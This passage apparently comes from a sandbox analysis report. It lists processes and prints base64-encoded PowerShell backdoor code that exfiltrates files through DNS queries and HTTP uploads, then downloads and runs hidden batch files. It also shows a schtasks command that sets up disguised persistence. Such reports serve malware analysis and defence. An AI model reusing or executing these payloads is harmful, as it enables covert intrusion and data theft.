ALgBIAGUAYQBkAGUAcgBzAC4AYQBkAGQAKAAnAEEAYwBjAGUAcAB0AC0ATABhAG4AZwB1AGEAZwBlACcALAAnAGUAbgAtAFUAUwAsAGUAbgA7AHEAPQAwAC4ANQAnACkAOwANAAoACQAJACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAGEAZABkACgAJwBBAGMAYwBlAHAAdAAtAEUAbgBjAG8AZABpAG4AZwAnACwAJwBnAHoAaQBwACwAIABkAGUAZgBsAGEAdABlACcAKQA7AA0ACgAJAAkAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AYQBkAGQAKAAnAFIAZQBmAGUAcgBlAHIAJwAsACcAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AZwBvAG8AZwBsAGUALgBjAG8AbQAnACkAOwANAAoACQAJACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAGEAZABkACgAJwBQAHIAYQBnAG0AYQAnACwAJwBuAG8ALQBjAGEAYwBoAGUAJwApADsADQAKAAkACQAkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBhAGQAZAAoACcAQwBhAGMAaABlAC0AQwBvAG4AdAByAG8AbAAnACwAJwBuAG8ALQBjAGEAYwBoAGUAJwApADsADQAKAAkACQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAoAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABmAGkAbABlACkAKQApACAAfAAgAE8AdQB0AC0ARgBpAGwAZQAgACQAZgBpAGwAZQAgAC0ARQBuAGMAbwBkAGkAbgBnACAARABlAGYAYQB1AGwAdAA7AA0ACgAJAAkAJABpAD0AMQA7AA0ACgAJAAkAdwBoAGkAbABlACgAJABpACAALQBsAGUAIAAzACkADQAKAAkACQB7AA0ACgAJAAkACQB0AHIAeQANAAoACQAJAAkAewANAAoACQAJAAkACQAkAHcAYwAuAFUAcABsAG8AYQBkAEYAaQBsAGUAKAAkAFMARQBSAFYARQBSACsAJwB1ACcALAAkAGYAaQBsAGUAKQA7AA0ACgAJAAkACQAJAGIAcgBlAGEAawA7AA0ACgAJAAkACQB9AA0ACgAJAAkACQBjAGEAdABjAGgAIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBFAHgAYwBlAHAAdABpAG8AbgBdAA0ACgAJAAkACQB7AA0ACgAJAAkACQAJACQAaQArACsAOwANAAoACQAJAAkACQBjAG8AbgB0AGkAbgB1AGUAOwANAAoACQAJAAkAfQANAAoACQAJAH0ADQAKAAkACQANAAoACQAJAGkAZgAgACgAJABpACAALQBlAHEAIAA0ACkADQAKAAkACQB7AA0ACgAJAAkACQAkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBhAGQAZAAoACcAUgBlAGYAZQByAGUAcgAnACwAJwBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBnAG8AbwBnAGwAZQAuAGMAbwBtACcAKQA7AA0ACgAJAAkACQAkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBhAGQAZAAoACcAQQBjAGMAZQBwAHQAJwAsACcAKgAvACoAJwApADsADQAKAAkACQAJACQAdwBjAC4ASABlAGEAZABlAHIAcwBbACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnAF0AIAA9ACAAJwBNAG8AegBpAGwAbABhAC8ANQAuADAAIAAoAFcAaQBuAGQAbwB3AHMAIABOAFQAIAA2AC4AMwA7ACAAVwBpAG4ANgA0ADsAIAB4ADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwANAAoACQAJAAkAJABpACAAPQAgADEAOwANAAoACQAJAAkAdwBoAGkAbABlACgAJABpACAALQBsAGUAIAAzACkADQAKAAkACQAJAHsADQAKAAkACQAJAAkAdAByAHkADQAKAAkACQAJAAkAewANAAoACQAJAAkACQAJACQAdwBjAC4AVQBwAGwAbwBhAGQARgBpAGwAZQAoACQAUwBFAFIAVgBFAFIAKwAnAHUAJwAsACQAZgBpAGwAZQApADsADQAKAAkACQAJAAkACQBiAHIAZQBhAGsAOwANAAoACQAJAAkACQB9AA0ACgAJAAkACQAJAGMAYQB0AGMAaAAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEUAeABjAGUAcAB0AGkAbwBuAF0ADQAKAAkACQAJAAkAewANAAoACQAJAAkACQAJACQAaQArACsAOwANAAoACQAJAAkACQAJAGMAbwBuAHQAaQBuAHUAZQA7AA0ACgAJAAkACQAJAH0ADQAKAAkACQAJAH0ADQAKAAkACQB9AA0ACgAJAH0ADQAKAAkAdwBhAGkAdABmAG8AcgAgAHUAcABsAHAAcgBvAGMAIAAvAFQAIAAxADsADQAKAAkAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAJABmAGkAbABlADsADQAKAH0ADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAVQBwAFQAaABlAG0AQQBsAGwADQAKAHsADQAKAAkAaQBmACgALQBuAG8AdAAoAFQAZQBzAHQALQBQAGEAdABoACAAJABNAFkASABPAE0ARQAkAFUAUABMAEsAKQApAA0ACgAJAHsADQAKAAkACQBOAGUAdwAtAEkAdABlAG0AIAAkAE0AWQBIAE8ATQBFACQAVQBQAEwASwAgAC0AdAB5AHAAZQAgAGYAaQBsAGUAOwANAAoACQAJAEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIAAkAE0AWQBIAE8ATQBFACQAVQBQACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAB7AHQAcgB5AHsAVQBwAGwAbwBhAGQARgBpAGwAZQBSAGUAbQBvAHYAZQAgACgAJABfAC4ARgB1AGwAbABOAGEAbQBlACkAfQBjAGEAdABjAGgAewBjAG8AbgB0AGkAbgB1AGUAfQB9ADsADQAKAAkACQBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAkAE0AWQBIAE8ATQBFACQAVQBQAEwASwAgAC0ARgBvAHIAYwBlADsADQAKAAkAfQANAAoAfQANAAoADQAKAA0ACgBmAHUAbgBjAHQAaQBvAG4AIABEAG8AdwBuAGwAbwBhAGQARQB4AGUAYwB1AHQAZQANAAoAewANAAoACQB0AHIAeQANAAoACQB7AA0ACgAJAAkAJABiAGEAdABmAGkAbABlACAAPQAgAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACAAKAAkAFMARQBSAFYARQBSACsAJwBiACcAKQAgACgAJABNAFkASABPAE0ARQArACQARABOACkAOwANAAoACQB9AA0ACgAJAGMAYQB0AGMAaAANAAoACQB7AA0ACgAJAAkAcgBlAHQAdQByAG4AOwANAAoACQB9AA0ACgAJACQAYQByAGcAcwA9ACIALwBjACAAIgArACQAYgBhAHQAZgBpAGwAZQArACIAIAA+ACAAIgArACQAYgBhAHQAZgBpAGwAZQArACIALgB0AHgAdAAiADsADQAKAAkAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAFcAYQBpAHQAIAAtAEYAaQBsAGUAUABhAHQAaAAgAGMAbQBkACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACQAYQByAGcAcwA7AA0ACgAJAFUAcABsAG8AYQBkAEYAaQBsAGUAUgBlAG0AbwB2AGUAKAAkAGIAYQB0AGYAaQBsAGUAKwAnAC4AdAB4AHQAJwApADsADQAKAAkAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAKAAkAGIAYQB0AGYAaQBsAGUAKQA7AA0ACgB9AA0ACgANAAoADQAKAGYAdQBuAGMAdABpAG8AbgAgAEkAbgBpAHQAQwBoAGUAYwBrAA0ACgB7AA0ACgAJAGkAZgAoAC0AbgBvAHQAKABUAGUAcwB0AC0AUABhAHQAaAAgACQATQBZAEgATwBNAEUAJABEAE4AKQApAA0ACgAJAHsADQAKAAkACQBOAGUAdwAtAEkAdABlAG0AIAAkAE0AWQBIAE8ATQBFACQARABOACAALQB0AHkAcABlACAAZABpAHIAZQBjAHQAbwByAHkAOwANAAoACQB9AA0ACgAJAGkAZgAoAC0AbgBvAHQAKABUAGUAcwB0AC0AUABhAHQAaAAgACQATQBZAEgATwBNAEUAJABVAFAAKQApAA0ACgAJAHsADQAKAAkACQBOAGUAdwAtAEkAdABlAG0AIAAkAE0AWQBIAE8ATQBFACQAVQBQACAALQB0AHkAcABlACAAZABpAHIAZQBjAHQAbwByAHkAOwANAAoACQB9AA0ACgAJAGkAZgAoAC0AbgBvAHQAKABUAGUAcwB0AC0AUABhAHQAaAAgACQATQBZAEgATwBNAEUAJABUAFAAKQApAA0ACgAJAHsADQAKAAkACQBOAGUAdwAtAEkAdABlAG0AIAAkAE0AWQBIAE8ATQBFACQAVABQACAALQB0AHkAcABlACAAZABpAHIAZQBjAHQAbwByAHkAOwANAAoACQB9AA0ACgB9AA0ACgANAAoADQAKAA0ACgBmAHUAbgBjAHQAaQBvAG4AIABBAGwAaQB2AGUADQAKAHsADQAKAAkASQBuAGkAdABDAGgAZQBjAGsAOwANAAoACQBEAG8AdwBuAFQAaABlAG0AQQBsAGwAOwANAAoACQBEAG8AdwBuAGwAbwBhAGQARQB4AGUAYwB1AHQAZQA7AA0ACgAJAFUAcABUAGgAZQBtAEEAbABsADsADQAKAH0ADQAKAA0ACgANAAoAQQBsAGkAdgBlADsA'}C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
3780"C:\Windows\System32\schtasks.exe" /create /F /sc minute /mo 3 /tn "GoogleUpdateTasksMachineUI" /tr C:\Users\Public\Libraries\RecordedTV\backup1.vbsC:\Windows\System32\schtasks.exef77ee804de304f7c3ea6b87824684b33.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Manages scheduled tasks
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\schtasks.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
3816"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "&{iex 'powershell -encodedcommand " JABnAGwAbwBiAGEAbAA6AG0AeQBoAG8AcwB0ACAAPQAgACcALgB1AHAAZABhAHQAZQByAC4AbABpACcAOwANAAoAJABnAGwAbwBiAGEAbAA6AGYAaQBsAGUAbgBhAG0AZQAgAD0AIAAnACcAOwANAAoAJABnAGwAbwBiAGEAbAA6AG0AeQBmAGwAYQBnACAAPQAgADAAOwANAAoAJABnAGwAbwBiAGEAbAA6AG0AeQBpAGQAIAA9ACAAJwAjACMAIwAnADsADQAKACQAZwBsAG8AYgBhAGwAOgBtAHkAaABvAG0AZQAgAD0AIAAiACQAZQBuAHYAOgBQAHUAYgBsAGkAYwBcAEwAaQBiAHIAYQByAGkAZQBzAFwAUgBlAGMAbwByAGQAZQBkAFQAVgBcACIAOwANAAoADQAKAA0ACgBmAHUAbgBjAHQAaQBvAG4AIABjAG8AbgB2AGUAcgB0AFQAbwAtAEIAYQBzAGUAMwA2ACAAKAAkAGQAZQBjAE4AdQBtAD0AIgAiACkADQAKAHsADQAKACAAIAAgACAAJABkAGUAYwBOAHUAbQAgACUAPQAgADQANgA2ADUANgA7AA0ACgAgACAAIAAgACQAYQBsAHAAaABhAGIAZQB0ACAAPQAgACIAMAAxADIAMwA0ADUANgA3ADgAOQBBAEIAQwBEAEUARgBHAEgASQBKAEsATABNAE4ATwBQAFEAUgBTAFQAVQBWAFcAWABZAFoAIgA7AA0ACgAgACAAIAAgAGQAbwANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJAByAGUAbQBhAGkAbgBkAGUAcgAgAD0AIAAoACQAZABlAGMATgB1AG0AIAAlACAAMwA2ACkAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYwBoAGEAcgAgAD0AIAAkAGEAbABwAGgAYQBiAGUAdAAuAHMAdQBiAHMAdAByAGkAbgBnACgAJAByAGUAbQBhAGkAbgBkAGUAcgAsADEAKQA7AA0ACgAgACAAIAAgACAAIAAgACAAJABiAGEAcwBlADMANgBOAHUAbQAgAD0AIAAiACQAYwBoAGEAcgAkAGIAYQBzAGUAMwA2AE4AdQBtACIAOwANAAoAIAAgACAAIAAgACAAIAAgACQAZABlAGMATgB1AG0AIAA9ACAAKAAkAGQAZQBjAE4AdQBtACAALQAgACQAcgBlAG0AYQBpAG4AZABlAHIAKQAgAC8AIAAzADYAOwANAAoAIAAgACAAIAB9AA0ACgAgACAAIAAgAHcAaABpAGwAZQAgACgAJABkAGUAYwBOAHUAbQAgAC0AZwB0ACAAMAApADsADQAKACAAIAAgACAAJABiAGEAcwBlADMANgBOAHUAbQAuAFAAYQBkAEwAZQBmAHQAKAAzACwAJwAwACcAKQA7AA0ACgB9AA0ACgBmAHUAbgBjAHQAaQBvAG4AIABHAGUAdABTAHUAYgAoACQAbQB5AGYAbABhAGcAMgAsACAAJABjAG0AZABpAGQAPQAnADAAMAAnACwAIAAkAHAAYQByAHQAaQBkAD0AJwAwADAAMAAnACkADQAKAHsADQAKACAAIAAgACAAaQBmACgAJABtAHkAZgBsAGEAZwAyACAALQBlAHEAIAAwACkADQAKACAAIAAgACAAewANAAoACQAJACgAJwB6AHoAMAAwADAAMAAwADAAJwArACgAYwBvAG4AdgBlAHIAdABUAG8ALQBCAGEAcwBlADMANgAoAEcAZQB0AC0AUgBhAG4AZABvAG0AIAAtAE0AYQB4AGkAbQB1AG0AIAA0ADYANgA1ADUAKQApACkAOwANAAoAIAAgACAAIAB9AA0ACgAgACAAIAAgAGUAbABzAGUAaQBmACgAJABtAHkAZgBsAGEAZwAyACAALQBlAHEAIAAxACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACgAJwB6AHoAJwArACQAZwBsAG8AYgBhAGwAOgBtAHkAaQBkACsAJwAwADAAMAAwADAAJwArACgAYwBvAG4AdgBlAHIAdABUAG8ALQBCAGEAcwBlADMANgAoAEcAZQB0AC0AUgBhAG4AZABvAG0AIAAtAE0AYQB4AGkAbQB1AG0AIAA0ADYANgA1ADUAKQApACkAOwANAAoAIAAgACAAIAB9AA0ACgAgACAAIAAgAGUAbABzAGUAaQBmACgAJABtAHkAZgBsAGEAZwAyACAALQBlAHEAIAAyACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACgAJwB6AHoAJwArACQAZwBsAG8AYgBhAGwAOgBtAHkAaQBkACsAJABjAG0AZABpAGQAKwAkAHAAYQByAHQAaQBkACsAKABjAG8AbgB2AGUAcgB0AFQAbwAtAEIAYQBzAGUAMwA2ACgARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0ATQBhAHgAaQBtAHUAbQAgADQANgA2ADUANQApACkAKQA7AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAGYAdQBuAGMAdABpAG8AbgAgAFMAdAByADIASABlAHgAKAAkAG0AeQBzAHQAcgApAA0ACgB7AA0ACgAgACAAIAAgAFsAUwB5AHMAdABlAG0ALgBCAGkAdABDAG8AbgB2AGUAcgB0AGUAcgBdADoAOgBUAG8AUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBEAGUAZgBhAHUAbAB0AC4ARwBlAHQAQgB5AHQAZQBzACgAJABtAHkAcwB0AHIAKQApAC4AUgBlAHAAbABhAGMAZQAoACIALQAiACwAIAAiACIAKQA7AA0ACgB9AA0ACgBmAHUAbgBjAHQAaQBvAG4AIABBAGwAaQB2AGUADQAKAHsADQAKAAkAaQBmACgAJABnAGwAbwBiAGEAbAA6AG0AeQBpAGQAIAAtAGUAcQAgACcAIwAnACsAJwAjACMAJwApAA0ACgAJAHsADQAKAAkACQByAGUAdAB1AHIAbgAgADAAOwANAAoACQB9AA0ACgAgACAAIAAgAFMAZQBuAGQAUgBlAGMAZQBpAHYAZQBEAE4AUwAgACgAKABHAGUAdABTAHUAYgAgADEAKQArACcAMwAwACcAKQA7AA0ACgAgACAAIAAgACQAcwB1AGIAIAA9ACAAKAAoAEcAZQB0AFMAdQBiACAAMQApACsAJwAyADMAMgBBACcAKQAgACsAIAAoAFMAdAByADIASABlAHgAIAAkAGcAbABvAGIAYQBsADoAZgBpAGwAZQBuAGEAbQBlACkAOwANAAoAIAAgACAAIAAkAGkAIAA9ACAAMQA7AA0ACgAgACAAIAAgACQAcgBlAHQAIAA9ACAAMAA7AA0ACgAgACAAIAAgAHcAaABpAGwAZQAoACQAZwBsAG8AYgBhAGwAOgBtAHkAZgBsAGEAZwAgAC0AZQBxACAAMQApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAHIAZQB0ACAAPQAgADEAOwANAAoAIAAgACAAIAAgACAAIAAgACQAcwB1AGIAMgAgAD0AIAAkAHMAdQBiACAAKwAgACgAUwB0AHIAMgBIAGUAeAAgACQAaQApADsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkAFIAZQBjAGUAaQB2AGUARABOAFMAIAAkAHMAdQBiADIAOwANAAoAIAAgACAAIAAgACAAIAAgACQAaQArACsAOwANAAoAIAAgACAAIAB9AA0ACgAgACAAIAAgAGkAZgAoACQAcgBlAHQAIAAtAGUAcQAgADEAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAARgBpAHgAQgBhAHQARgBpAGwAZQAgACgAJABnAGwAbwBiAGEAbAA6AG0AeQBoAG8AbQBlACsAJwB0AHAAXAAnACsAJABnAGwAbwBiAGEAbAA6AGYAaQBsAGUAbgBhAG0AZQArACIALgBiAGEAdAAiACkAOwANAAoAIAAgACAAIAB9AA0ACgAgACAAIAAgACQAcgBlAHQAOwANAAoAfQANAAoADQAKAGYAdQBuAGMAdABpAG8AbgAgAFMAZQBuAGQAUgBlAGMAZQBpAHYAZQBEAE4AUwAgACgAJABkACkADQAKAHsADQAKAAkAJABjAG4AdAAgAD0AIAAwADsADQAKAAkAdwBoAGkAbABlACAAKAAkAGMAbgB0ACAALQBsAHQAIAAyADAAKQANAAoACQB7AA0ACgAJAAkAdAByAHkADQAKAAkACQB7AA0ACgAJAAkACQAkAG0AeQBkAGEAdABhACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4ARABOAFMAXQA6ADoARwBlAHQASABvAHMAdABCAHkATgBhAG0AZQAoACQAZAArACQAZwBsAG8AYgBhAGwAOgBtAHkAaABvAHMAdAApAC4AQQBkAGQAcgBlAHMAcwBMAGkAcwB0AFsAMABdACkAOwANAAoACQAJAAkAJABtAHkAZABhAHQAYQAgAD0AIAAoACQAbQB5AGQAYQB0AGEAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBJAFAAQQBkAGQAcgBlAHMAcwBUAG8AUwB0AHIAaQBuAGcAfQApADsADQAKAAkACQAJACQAYwBuAHQAIAA9ACAAMgA1ADsADQAKAAkACQB9AA0ACgAJAAkAYwBhAHQAYwBoAA0ACgAJAAkAewANAAoACQAJAAkAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBtACAANQAwADAAOwANAAoACQAJAAkAJABjAG4AdAArACsAOwANAAoACQAJAH0ADQAKAAkAfQANAAoAIAAgACAAIABpAGYAKAAtAG4AbwB0ACgAJABjAG4AdAAgAC0AZQBxACAAMgA1ACkAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAKAAnACMAJwArACcAIwAjACcAKQA7AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAZQBsAHMAZQBpAGYAKAAkAGcAbABvAGIAYQBsADoAbQB5AGYAbABhAGcAIAAtAGUAcQAgADAAIAAtAGEAbgBkACAAJABtAHkAZABhAHQAYQAuAFMAdABhAHIAdABzAFcAaQB0AGgAKAAnADMAMwAuADMAMwAuACcAKQApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAHQAbQBwACAAPQAgACQAbQB5AGQAYQB0AGEALgBTAHUAYgBTAHQAcgBpAG4AZwAoADYAKQAuAFMAcABsAGkAdAAoACcALgAnACkAOwANAAoAIAAgACAAIAAgACAAIAAgACQAZwBsAG8AYgBhAGwAOgBmAGkAbABlAG4AYQBtAGUAIAA9ACAAKABbAGMAaABhAHIAXQAgAFsAaQBuAHQAXQAgACQAdABtAHAAWwAwAF0AKQAgACsAIAAoAFsAYwBoAGEAcgBdACAAWwBpAG4AdABdACAAJAB0AG0AcABbADEAXQApADsADQAKACAAIAAgACAAIAAgACAAIAAkAGcAbABvAGIAYQBsADoAbQB5AGYAbABhAGcAIAA9ACAAMQA7AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAZQBsAHMAZQBpAGYAIAAoACQAbQB5AGQAYQB0AGEALgBFAHEAdQBhAGwAcwAoACcAMwA1AC4AMwA1AC4AMwA1AC4AMwA1ACcAKQApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGcAbABvAGIAYQBsADoAbQB5AGYAbABhAGcAIAA9ACAAMAA7AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAZQBsAHMAZQBpAGYAIAAoACQAZwBsAG8AYgBhAGwAOgBtAHkAZgBsAGEAZwAgAC0AZQBxACAAMQApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAHQAbQBwACAAPQAgACQAbQB5AGQAYQB0AGEALgBTAHAAbABpAHQAKAAnAC4AJwApADsADQAKACAAIAAgACAAIAAgACAAIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBdADoAOgBBAHAAcABlAG4AZABBAGwAbABUAGUAeAB0ACgAJABnAGwAbwBiAGEAbAA6AG0AeQBoAG8AbQBlACsAJwB0AHAAXAAnACsAJABnAGwAbwBiAGEAbAA6AGYAaQBsAGUAbgBhAG0AZQArACIALgBiAGEAdAAiACwAIAAoACgAWwBjAGgAYQByAF0AIABbAGkAbgB0AF0AIAAkAHQAbQBwAFsAMABdACkAIAArACAAKABbAGMAaABhAHIAXQAgAFsAaQBuAHQAXQAgACQAdABtAHAAWwAxAF0AKQAgACsAIAAoAFsAYwBoAGEAcgBdACAAWwBpAG4AdABdACAAJAB0AG0AcABbADIAXQApACAAKwAgACgAWwBjAGgAYQByAF0AIABbAGkAbgB0AF0AIAAkAHQAbQBwAFsAMwBdACkAKQApADsADQAKACAAIAAgACAAfQANAAoAIAAgACAAIABlAGwAcwBlAGkAZgAoACQAZwBsAG8AYgBhAGwAOgBtAHkAaQBkACAALQBlAHEAIAAnACMAJwArACcAIwAjACcAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAKABbAGMAaABhAHIAXQAgAFsAaQBuAHQAXQAgACQAbQB5AGQAYQB0AGEALgBTAHAAbABpAHQAKAAnAC4AJwApAFsAMABdACkAOwANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgBmAHUAbgBjAHQAaQBvAG4AIABGAGkAeABCAGEAdABGAGkAbABlACAAKAAkAGIAYQB0AHAAYQB0AGgAKQANAAoAewANAAoAIAAgACAAIAAoAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgACQAYgBhAHQAcABhAHQAaAApAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAxADAAKQAgAHwAIABTAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAkAGIAYQB0AHAAYQB0AGgAOwANAAoAfQANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZABGAGkAbABlACgAJABtAHkARgBpAGwAZQBQAGEAdABoACkADQAKAHsADQAKACAAIAAgACAAJABtAHkARgBpAGwAZQBOAGEAbQBlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBQAGEAdABoAF0AOgA6AEcAZQB0AEYAaQBsAGUATgBhAG0AZQBXAGkAdABoAG8AdQB0AEUAeAB0AGUAbgBzAGkAbwBuACgAJABtAHkARgBpAGwAZQBQAGEAdABoACkAOwANAAoAIAAgACAAIAAkAG0AeQBzAHQAcgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBdADoAOgBSAGUAYQBkAEEAbABsAFQAZQB4AHQAKAAkAG0AeQBGAGkAbABlAFAAYQB0AGgAKQA7AA0ACgAgACAAIAAgACQAaQA9ADAAOwANAAoAIAAgACAAIAAkAG0AeQB0AGUAbQBwACAAPQAgACcAJwA7AA0ACgAgACAAIAAgACQAagA9ADAAOwANAAoAIAAgACAAIAB3AGgAaQBsAGUAKAAkAGkAIAAtAGwAZQAgACQAbQB5AHMAdAByAC4ATABlAG4AZwB0AGgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABtAHkAdABlAG0AcAAgACsAPQAgACQAbQB5AHMAdAByAFsAJABpAF0AOwANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAoACgAKAAkAGkAJQAyADQAKQAgAC0AZQBxACAAMgAzACkAIAAtAG8AcgAgACgAJABpACAALQBlAHEAIAAkAG0AeQBzAHQAcgAuAEwAZQBuAGcAdABoACkAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAbQB5AGgAZQB4ACAAPQAgAFMAdAByADIASABlAHgAIAAkAG0AeQB0AGUAbQBwADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFMAZQBuAGQAUgBlAGMAZQBpAHYAZQBEAE4AUwAgACgAKABHAGUAdABTAHUAYgAgADIAIAAkAG0AeQBGAGkAbABlAE4AYQBtAGUAIAAoAGMAbwBuAHYAZQByAHQAVABvAC0AQgBhAHMAZQAzADYAIAAkAGoAKQApACAAKwAgACQAbQB5AGgAZQB4ACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABqACsAKwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAG0AeQB0AGUAbQBwACAAPQAgACcAJwA7AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACQAaQArACsAOwANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgBmAHUAbgBjAHQAaQBvAG4AIABHAGUAdABJAEQADQAKAHsADQAKAAkAJAB2AGEAbABpAGQAYwBoAGEAcgBzACAAPQAgACIAMAAxADIAMwA0ADUANgA3ADgAOQBBAEIAQwBEAEUARgBHAEgASQBKAEsATABNAE4ATwBQAFEAUgBTAFQAVQBWAFcAWABZAFoAYQBiAGMAZABlAGYAZwBoAGkAagBrAGwAbQBuAG8AcABxAHIAcwB0AHUAdgB3AHgAeQB6ACIAOwANAAoAIAAgACAAIAAkAHQAaQBkACAAPQAgAFMAZQBuAGQAUgBlAGMAZQBpAHYAZQBEAE4AUwAgACgAKABHAGUAdABTAHUAYgAgADAAKQArACcAMwAwACcAKQA7AA0ACgAJAGkAZgAgACgAJAB2AGEAbABpAGQAYwBoAGEAcgBzAC4AQwBvAG4AdABhAGkAbgBzACgAJAB0AGkAZAApACkAewAkAGcAbABvAGIAYQBsADoAbQB5AGkAZAA9ACQAdABpAGQAOwB9AA0ACgB9AA0ACgBmAHUAbgBjAHQAaQBvAG4AIABDAGgAYQBuAGcAZQBUAGgAaQBzAEYAaQBsAGUAIAAoACQAYgBvAHQAaQBkACkADQAKAHsADQAKAAkAaQBmACgALQBuAG8AdAAoACQAZwBsAG8AYgBhAGwAOgBtAHkAaQBkACAALQBlAHEAIAAoACcAIwAnACsAJwAjACMAJwApACkAKQANAAoAIAAgACAAIAB7AA0ACgAJAAkAJABmAGMAPQAoAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgACQAZQBuAHYAOgBQAHUAYgBsAGkAYwBcAEwAaQBiAHIAYQByAGkAZQBzAFwAUgBlAGMAbwByAGQAZQBkAFQAVgBcAEQAbgBTADEALgBwAHMAMQAgAC0ARQBuAGMAbwBkAGkAbgBnACAAQQBzAGMAaQBpACkAOwANAAoACQAJACQAZgBjAD0AJABmAGMALgBTAHUAYgBTAHQAcgBpAG4AZwAoADQANwApAC4AVAByAGkAbQBFAG4AZAAoACcAIgAnACcAfQAiACcAKQA7AA0ACgAJAAkAJABmAGMAPQBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAGMAKQApADsADQAKAAkACQAkAGYAYwA9ACQAZgBjACAALQByAGUAcABsAGEAY